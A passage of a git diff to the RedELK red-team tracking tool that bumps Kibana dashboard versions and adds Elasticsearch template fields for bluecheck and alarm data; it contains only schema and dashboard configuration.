"464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -1835,8 +1835,8 @@ } ], "sort": [ - 1642152856829, - 2240 + 1642171875895, + 130 ], "type": "visualization", "version": "1" @@ -1929,7 +1929,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -1957,8 +1957,8 @@ } ], "sort": [ - 1642152856829, - 2245 + 1642171875895, + 135 ], "type": "visualization", "version": "1" @@ -2023,7 +2023,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2036,8 +2036,8 @@ } ], "sort": [ - 1642152856829, - 2247 + 1642171875895, + 137 ], "type": "visualization", "version": "1" @@ -2102,7 +2102,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2115,8 +2115,8 @@ } ], "sort": [ - 1642152856829, - 2249 + 1642171875895, + 139 ], "type": "visualization", "version": "1" @@ -2182,7 +2182,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2195,8 +2195,8 @@ } ], "sort": [ - 1642152856829, - 2251 + 1642171875895, + 141 ], "type": "visualization", "version": "1" @@ -2265,7 +2265,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2278,8 +2278,8 @@ } ], "sort": [ - 1642152856829, - 2253 + 1642171875895, + 143 ], "type": "visualization", "version": "1" @@ -2341,7 +2341,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2354,8 +2354,8 @@ } ], "sort": [ - 1642152856829, - 2255 + 1642171875895, + 145 ], "type": "visualization", "version": "1" @@ -2424,7 +2424,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2437,8 +2437,8 @@ } ], "sort": [ - 1642152856829, - 2257 + 1642171875895, + 147 ], "type": "visualization", "version": "1" @@ -2503,7 +2503,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2516,8 +2516,8 @@ } ], "sort": [ - 1642152856829, - 2259 + 1642171875895, + 149 ], "type": "visualization", "version": "1" @@ -2659,7 +2659,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2672,8 +2672,8 @@ } ], "sort": [ - 1642152856829, - 2261 + 1642171875895, + 151 ], "type": "visualization", "version": "1" @@ -2784,7 +2784,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2802,8 +2802,8 @@ } ], "sort": [ - 1642152856829, - 2264 + 1642171875895, + 154 ], "type": "visualization", "version": "1" @@ -2868,7 +2868,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "88db1280-d024-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -2881,8 +2881,8 @@ } ], "sort": [ - 1642152856829, - 2266 + 1642171875895, + 156 ], "type": "visualization", "version": "1" @@ -2951,7 +2951,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -2964,8 +2964,8 @@ } ], "sort": [ - 1642152856829, - 2268 + 1642171875895, + 158 ], "type": "visualization", "version": "1" @@ -3050,7 +3050,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "a5554e20-d025-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3063,8 +3063,8 @@ } ], "sort": [ - 1642152856829, - 2270 + 1642171875895, + 160 ], "type": "visualization", "version": "1" @@ -3204,7 +3204,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ab609c60-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3217,8 +3217,8 @@ } ], "sort": [ - 1642152856829, - 2272 + 1642171875895, + 162 ], "type": "visualization", "version": "1" @@ -3280,7 +3280,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "abdcd940-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3293,8 +3293,8 @@ } ], "sort": [ - 1642152856829, - 2274 + 1642171875895, + 164 ], "type": "visualization", "version": "1" @@ -3450,7 +3450,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3463,8 +3463,8 @@ } ], "sort": [ - 1642152856829, - 2276 + 1642171875895, + 166 ], "type": "visualization", "version": "1" @@ -3530,7 +3530,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3543,8 +3543,8 @@ } ], "sort": [ - 1642152856829, - 2278 + 1642171875895, + 168 ], "type": "visualization", "version": "1" @@ -3609,7 +3609,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -3622,8 +3622,8 @@ } ], "sort": [ - 1642152856829, - 2280 + 1642171875895, + 170 ], "type": "visualization", "version": "1" @@ -3799,7 +3799,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "be08d380-efe9-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3812,8 +3812,8 @@ } ], "sort": [ - 1642152856829, - 2282 + 1642171875895, + 172 ], "type": "visualization", "version": "1" @@ -3914,7 +3914,7 @@ "type": "table" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "cbb7d710-efee-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -3927,8 +3927,8 @@ } ], "sort": [ - 1642152856829, - 2284 + 1642171875895, + 174 ], "type": "visualization", "version": "1" @@ -4004,7 +4004,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ce581930-d361-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4017,8 +4017,8 @@ } ], "sort": [ - 1642152856829, - 2286 + 1642171875895, + 176 ], "type": "visualization", "version": "1" @@ -4081,7 +4081,7 @@ "type": "input_control_vis" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4099,8 +4099,8 @@ } ], "sort": [ - 1642152856829, - 2289 + 1642171875895, + 179 ], "type": "visualization", "version": "1" @@ -4194,7 +4194,7 @@ "type": "pie" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "d625ba60-efe8-11eb-8a9f-2572da287875", "migrationVersion": { "visualization": "7.14.0" @@ -4207,8 +4207,8 @@ } ], "sort": [ - 1642152856829, - 2291 + 1642171875895, + 181 ], "type": "visualization", "version": "1" @@ -4273,7 +4273,7 @@ "type": "metric" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "dcf86190-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4286,8 +4286,8 @@ } ], "sort": [ - 1642152856829, - 2293 + 1642171875895, + 183 ], "type": "visualization", "version": "1" @@ -4417,7 +4417,7 @@ "type": "line" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4430,8 +4430,8 @@ } ], "sort": [ - 1642152856829, - 2295 + 1642171875895, + 185 ], "type": "visualization", "version": "1" @@ -4522,7 +4522,7 @@ "type": "tile_map" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "e97f6f10-b982-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4535,8 +4535,8 @@ } ], "sort": [ - 1642152856829, - 2297 + 1642171875895, + 187 ], "type": "visualization", "version": "1" @@ -4714,7 +4714,7 @@ "type": "horizontal_bar" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "migrationVersion": { "visualization": "7.14.0" @@ -4732,8 +4732,8 @@ } ], "sort": [ - 1642152856829, - 2300 + 1642171875895, + 190 ], "type": "visualization", "version": "1" @@ -4890,7 +4890,7 @@ "type": "histogram" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4903,8 +4903,8 @@ } ], "sort": [ - 1642152856829, - 2302 + 1642171875895, + 192 ], "type": "visualization", "version": "1" @@ -4966,7 +4966,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -4979,8 +4979,8 @@ } ], "sort": [ - 1642152856829, - 2304 + 1642171875895, + 194 ], "type": "visualization", "version": "1" @@ -5042,7 +5042,7 @@ "type": "tagcloud" } }, - "coreMigrationVersion": "7.16.2", + "coreMigrationVersion": "7.16.3", "id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "migrationVersion": { "visualization": "7.14.0" @@ -5055,8 +5055,8 @@ } ], "sort": [ - 1642152856829, - 2306 + 1642171875895, + 196 ], "type": "visualization", "version": "1" diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json index 668a1be1..9ff9b079 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_bluecheck.json @@ -7,6 +7,49 @@ "_meta": {}, "_source": {}, "properties": { + "bluecheck": { + "properties": { + "accountname": { + "type": "text" + }, + "accountstate": { + "type": "text" + }, + "certissuer": { + "type": "text" + }, + "certsubject": { + "type": "text" + }, + "message": { + "type": "text" + }, + "pwchangedate": { + "type": "date" + }, + "sectools": { + "properties": { + "ProcessID": { + "type": "text" + }, + "Product": { + "type": "text" + }, + "Vendor": { + "type": "text" + } + }, + "type": "nested" + }, + "sectoolsamount": { + "type": "integer" + }, + "uri": { + "type": "text" + } + }, + "type": "object" + }, "bluechecktimestamp": { "type": "text" }, @@ -107,5 +150,5 @@ }, "order": 0, "settings": {}, - "version": 1 + "version": 3 } \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json index a40920c4..d48ab86f 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_elasticsearch_template_redirtraffic.json @@ -64,6 +64,27 @@ }, "alarm": { "properties": { + "alarm_httptraffic": { + "properties": { + "last_alarmed": { + "doc_values": true, + "ignore_malformed": false, + "index": true, + "store": false, + "type": "date_nanos" + }, + "last_checked": { + "type": "date_nanos" + } + }, + "type": "object" + }, + "last_alarmed": { + "type": "date_nanos" + }, + "last_checked": { + "type": "date_nanos" + }, "timestamp": { "type": "date" } @@ -704,6 +725,9 @@ "ip": { "type": "ip" }, + "ip_otherproxies": { + "type": "keyword" + }, "port": { "type": "long" } diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson index d3ea8c37..a14964ad 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_dashboard.ndjson @@ -1,12 +1,12 @@ -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\"},\"panelIndex\":\"93f74516-7d73-4db3-8d64-589dfd7492b7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_93f74516-7d73-4db3-8d64-589dfd7492b7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"66e33663-63c3-4e78-aa5d-725e33754c02\"},\"panelIndex\":\"66e33663-63c3-4e78-aa5d-725e33754c02\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_66e33663-63c3-4e78-aa5d-725e33754c02\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":8,\"h\":9,\"i\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},\"panelIndex\":\"800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":4,\"w\":8,\"h\":9,\"i\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\"},\"panelIndex\":\"86117a55-669e-4d4d-a4d6-436da4f1a930\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_86117a55-669e-4d4d-a4d6-436da4f1a930\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":4,\"w\":8,\"h\":9,\"i\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\"},\"panelIndex\":\"ab07bed8-9d4e-409c-b3db-d15124eb5467\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_ab07bed8-9d4e-409c-b3db-d15124eb5467\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":4,\"w\":8,\"h\":9,\"i\":\"019655aa-c9de-444a-a4af-619b7297572b\"},\"panelIndex\":\"019655aa-c9de-444a-a4af-619b7297572b\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_019655aa-c9de-444a-a4af-619b7297572b\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":4,\"w\":16,\"h\":9,\"i\":\"43a0761e-49bc-4846-9956-04a604b063ec\"},\"panelIndex\":\"43a0761e-49bc-4846-9956-04a604b063ec\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_43a0761e-49bc-4846-9956-04a604b063ec\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":13,\"w\":8,\"h\":9,\"i\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},\"panelIndex\":\"eab2038d-128a-4b5b-8a72-701fd3f53bd8\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":8,\"y\":13,\"w\":8,\"h\":9,\"i\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\"},\"panelIndex\":\"e18544fe-ac30-43cf-891c-4448ffea6bbd\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e18544fe-ac30-43cf-891c-4448ffea6bbd\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":16,\"y\":13,\"w\":16,\"h\":9,\"i\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},\"panelIndex\":\"6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Compromised realms\",\"panelRefName\":\"panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":32,\"y\":13,\"w\":8,\"h\":9,\"i\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},\"panelIndex\":\"223951c1-7fe0-40f9-9a89-0c91aedd7fce\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":40,\"y\":13,\"w\":8,\"h\":9,\"i\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\"},\"panelIndex\":\"c15dc2cd-fad3-44a3-b127-1cd47d837740\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_c15dc2cd-fad3-44a3-b127-1cd47d837740\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-12M", "timeRestore": true, "timeTo": "now", "title": "RedELK - Summary dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "02486040-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "93f74516-7d73-4db3-8d64-589dfd7492b7:panel_93f74516-7d73-4db3-8d64-589dfd7492b7", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "66e33663-63c3-4e78-aa5d-725e33754c02:panel_66e33663-63c3-4e78-aa5d-725e33754c02", "type": "visualization"}, {"id": "b19d4790-d35f-11ea-9301-a30a04251ae9", "name": "800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3:panel_800e8be4-f7c9-46b8-8a7b-e9f229aeb1a3", "type": "visualization"}, {"id": "dcf86190-d319-11ea-9301-a30a04251ae9", "name": "86117a55-669e-4d4d-a4d6-436da4f1a930:panel_86117a55-669e-4d4d-a4d6-436da4f1a930", "type": "visualization"}, {"id": "b5beb3c0-d04b-11ea-9301-a30a04251ae9", "name": "ab07bed8-9d4e-409c-b3db-d15124eb5467:panel_ab07bed8-9d4e-409c-b3db-d15124eb5467", "type": "visualization"}, {"id": "389dddc0-d317-11ea-9301-a30a04251ae9", "name": "019655aa-c9de-444a-a4af-619b7297572b:panel_019655aa-c9de-444a-a4af-619b7297572b", "type": "visualization"}, {"id": "ce581930-d361-11ea-9301-a30a04251ae9", "name": "43a0761e-49bc-4846-9956-04a604b063ec:panel_43a0761e-49bc-4846-9956-04a604b063ec", "type": "visualization"}, {"id": "57626ad0-d355-11ea-9301-a30a04251ae9", "name": "eab2038d-128a-4b5b-8a72-701fd3f53bd8:panel_eab2038d-128a-4b5b-8a72-701fd3f53bd8", "type": "visualization"}, {"id": "464660c0-d360-11ea-9301-a30a04251ae9", "name": "e18544fe-ac30-43cf-891c-4448ffea6bbd:panel_e18544fe-ac30-43cf-891c-4448ffea6bbd", "type": "visualization"}, {"id": "ff4497f0-d319-11ea-9301-a30a04251ae9", "name": "6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d:panel_6eb4c88f-1f04-42e1-9300-2fad1e3f6c9d", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "223951c1-7fe0-40f9-9a89-0c91aedd7fce:panel_223951c1-7fe0-40f9-9a89-0c91aedd7fce", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "c15dc2cd-fad3-44a3-b127-1cd47d837740:panel_c15dc2cd-fad3-44a3-b127-1cd47d837740", "type": "visualization"}], "sort": [1642152857910, 2054], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},\"panelIndex\":\"9af964d0-b9c5-4fa0-81d7-6e7cf9657757\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":6,\"i\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\"},\"panelIndex\":\"09cb7bd6-8162-4141-8a0c-807ee57a4603\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Target host(s) and user(s) filter\",\"panelRefName\":\"panel_09cb7bd6-8162-4141-8a0c-807ee57a4603\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":12,\"h\":6,\"i\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},\"panelIndex\":\"fcd3a5bc-91d9-46a2-b08c-92958c5b6089\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per host\",\"panelRefName\":\"panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":36,\"y\":2,\"w\":12,\"h\":6,\"i\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},\"panelIndex\":\"47710d04-18f9-4563-bf0d-73b4dc24f9e5\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Implants per user\",\"panelRefName\":\"panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":8,\"w\":48,\"h\":51,\"i\":\"30674424-d470-4b93-80c1-260d16f987ab\"},\"panelIndex\":\"30674424-d470-4b93-80c1-260d16f987ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_30674424-d470-4b93-80c1-260d16f987ab\"}]", "timeRestore": false, "title": "RedELK - Red Team Operations", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "04b87c50-d028-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "9af964d0-b9c5-4fa0-81d7-6e7cf9657757:panel_9af964d0-b9c5-4fa0-81d7-6e7cf9657757", "type": "visualization"}, {"id": "d2c7b720-d026-11ea-9301-a30a04251ae9", "name": "09cb7bd6-8162-4141-8a0c-807ee57a4603:panel_09cb7bd6-8162-4141-8a0c-807ee57a4603", "type": "visualization"}, {"id": "632081a0-d02a-11ea-9301-a30a04251ae9", "name": "fcd3a5bc-91d9-46a2-b08c-92958c5b6089:panel_fcd3a5bc-91d9-46a2-b08c-92958c5b6089", "type": "visualization"}, {"id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "name": "47710d04-18f9-4563-bf0d-73b4dc24f9e5:panel_47710d04-18f9-4563-bf0d-73b4dc24f9e5", "type": "visualization"}, {"id": "1c580960-b6a9-11e8-bc1a-cf8fa3255855", "name": "30674424-d470-4b93-80c1-260d16f987ab:panel_30674424-d470-4b93-80c1-260d16f987ab", "type": "search"}], "sort": [1642152857910, 2060], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},\"panelIndex\":\"8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":9,\"i\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},\"panelIndex\":\"ecf77ead-e22f-4708-addf-0cbaaeb6fced\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Techniques, Tactics and Procedures\",\"panelRefName\":\"panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":18,\"i\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},\"panelIndex\":\"ff3f84bc-6c84-43fd-aa0f-19e5a91be826\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks per host and user\",\"panelRefName\":\"panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":24,\"h\":9,\"i\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},\"panelIndex\":\"23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Cobalt Strike tasks per operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642152857910, 2066], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": 